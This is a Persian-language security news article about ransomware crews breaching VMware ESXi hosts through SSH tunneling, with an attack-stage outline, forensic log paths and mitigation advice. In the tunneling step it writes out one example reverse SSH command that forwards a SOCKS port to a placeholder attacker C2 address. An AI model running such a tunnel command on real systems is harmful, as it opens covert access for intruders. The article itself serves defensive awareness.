خانه » تمرکز حملات باج افزاری بر روی میزبان‌های VMware ESXi از طریق SSH Tunneling

تمرکز حملات باج افزاری بر روی میزبان‌های VMware ESXi از طریق SSH Tunneling

توسط Vulnerbyt_News
تهدیدات سایبری - گروه vulnerbyte - گروه والنربایت -vulnerbyte group - میزبان‌های VMware ESXi - حملات باج افزاری - SSH Tunneling

مهاجمان در حملات باج ‌افزاری اخیر، میزبان‌های VMware ESXi را توسط SSH Tunneling مورد نفوذ قرار میدهند. آن‌ها با سوء استفاده از سرویس SSH داخلی  ESXi که به‌طور معمول برای مدیریت از راه دور استفاده می‌شود، تونل‌های مخفی به سرورهای فرماندهی و کنترل (C2) خود ایجاد می‌کنند. این روش به آن‌ها امکان می‌دهد تا بدون شناسایی، به شبکه دسترسی داشته باشند، باج ‌افزار را مستقر و فایل‌های قربانی را رمزگذاری کنند.

این حملات از آن جهت اهمیت دارند که میزبان‌های ESXi در محیط‌های مجازی‌سازی گسترده‌ای برای اجرای ماشین‌های مجازی متعدد استفاده می‌شوند و بنابراین هدف جذابی برای حملات باج ‌افزاری به شمار می‌آیند.

از آنجایی که دستگاه‌های ESXi معمولاً مانیتور نمی‌شوند، هکرها از این فرصت استفاده می‌کنند تا داده‌ها را استخراج و ماشین‌های مجازی را مختل کنند.

هکرها به جای نفوذ به هر سیستم guest (مهمان) به‌طور جداگانه، می‌توانند تمرکز خود را بر روی خود میزبان ESXi قرار دهند که به آن‌ها این امکان را می‌دهد تا همه دیسک‌های مجازی را در یک حمله هماهنگ رمزگذاری کنند.

هنگام غیرقابل دسترس شدن ماشین‌های مجازی، سازمان ها یا ملزم به بازیابی سریع عملکردهای حیاتی شده یا مجبور به پرداخت باج می‌شوند. تداوم کسب و کار، شهرت و درآمد در این مسائل با ریسک قابل توجهی همراه است.

علاوه بر گذاری، حمله‌کنندگان از سرورهای ESXi به‌عنوان نقاط محوری برای دسترسی گسترده‌تر به شبکه‌های داخلی سازمان‌ها استفاده می‌کنند. مهاجمان با استفاده از SSH برای ایجاد تونل SOCKS، می‌توانند به‌طور جانبی در شبکه حرکت کرده و ترافیک را با عملیات متداول مدیریتی کنترل کنند.

سیستم‌های آسیب پذیر به‌ ندرت راه‌اندازی مجدد (reboot) می‌شوند از این رو، محیطی ایده‌آل برای استقرار بکدورها با دسترسی مداوم فراهم می‌آورند.

 

متد حمله

  1. دسترسی اولیه: مهاجمان با سوءاستفاده از آسیب پذیری‌ها (مانند CVE-2021-21974) یا استفاده از داده‌های لاگین مدیریتی ربوده شده، به میزبان‌های VMware ESXi دسترسی پیدا می‌کنند.این متدها به مهاجمان اجازه می‌دهند تا مکانیزم احرازهویت را دوربزنند و بر دستگاه نظارت کنند.
  2. ایجاد SSH Tunnel: مهاجمان پس از لاگین به سرور، از قابلیت ذاتی SSH دستگاه‌های ESXi برای ایجاد تونل SOCKS استفاده می‌کنند. تونل SOCKS معمولا با دستوری مانند ssh –fN -R 0.0.1:<SOCKS port> <user>@<C2 IP address> راه اندازی می‌شود. این port-forwarding ، میزبان ESXi آسیب پذیر را به سرور فرماندهی و کنترل مهاجم (C2) پیوند می‌دهد و آنها را قادر می‌سازد تا ترافیک مخرب را از طریق میزبان هدایت کرده و در عین حال با فعالیت قانونی شبکه ادغام شوند.
  3. تداوم دسترسی: ابزار ESXi به ندرت راه اندازی مجدد (reboot) می‌شود و شبکه را برای حفظ بکدورهای ناشناخته ایده آل می‌کند.
  4. شناسایی و حرکت جانبی: مهاجمان با استفاده از تونل ایجاد شده، شناسایی در شبکه هک شده را انجام می‌دهند و اهداف دیگر و داده‌های حساس را شناسایی می‌کنند.
  5. رمزگذاری و استقرار باج افزار: مهاجمان پس از جمع آوری اطلاعات، پیلودهای باج افزاری را برای رمزگذاری فایل‌های حیاتی ماشین‌های مجازی مانند vmdk. و vmem. مستقر می‌کنند. این کار منجر به غیرقابل دسترس شدن کل محیط‌های مجازی می‌شود. سپس مهاجم تقاضای دریافت باج می‌کند که اغلب با تهدید به استخراج داده‌ها یا افشای عمومی همراه است.
تهدیدات سایبری - گروه vulnerbyte - گروه والنربایت -vulnerbyte group - میزبان‌های VMware ESXi - حملات باج افزاری - SSH Tunneling

معماری ثبت لاگ‌ سرورهای ESXi تحقیقات جنایی را پیچیده می‌کند. برخلاف سیستم‌های syslog مرکزی، ESXi لاگ‌ها را در چندین فایل مختلف توزیع می‌کند  (مانند /var/log/shell.log (فعالیت‌های شل) و  /var/log/auth.log (رویدادهای احراز هویت)).

این تقسیم ‌بندی نیاز دارد تا محققان شواهد را از منابع مختلف جمع‌آوری کنند. علاوه بر این، استفاده از تونل SSH، فعالیت‌های مخرب را به‌عنوان ترافیک عادی مدیریتی پنهان می‌کند.

از آنجا که بسیاری از سازمان‌ها، محیط‌های ESXi خود را به‌طور فعال نظارت نمی‌کنند، این حملات ممکن است برای مدت طولانی بدون شناسایی ادامه یابند.

محققان توصیه می‌کنند که دسترسی‌های مدیریتی محدود شوند و اطمینان حاصل گردد که SSH به‌طور پیش‌فرض روی میزبان‌های ESXi غیرفعال بوده و تنها در صورت ضرورت فعال شود.

اعمال منظم پچ‌ها برای رفع به موقع آسیب ‌پذیری‌ها، به ویژه آن‌هایی که اجازه اجرای کد از راه دور یا سرقت داده‌های احراز هویت را فراهم می‌آورند، بسیار حیاتی است. سیاست‌های احراز هویت قوی، از جمله روش‌های احراز هویت چندعاملی، احتمال نفوذ از طریق حملات بروت فورس به داده‌های لاگین admin را کاهش می‌دهند.

این موج جدید از باج‌افزارها نشان می‌دهد که مهاجمان همچنان در حال انطباق با شرایط هستند تا از بحش‌های نادیده‌گرفته ‌شده زیرساخت‌های مجازی سوءاستفاده کنند.

سازمان‌ها می‌توانند با اولویت دادن به کنترل‌های امنیتی در محیط‌های ESXi و نظارت دقیق بر استفاده از  SSH، تهدیدات را پیش‌بینی و قابلیت اطمینان عملیات مجازی خود را حفظ کنند.

 

منابع

همچنین ممکن است دوست داشته باشید

پیام بگذارید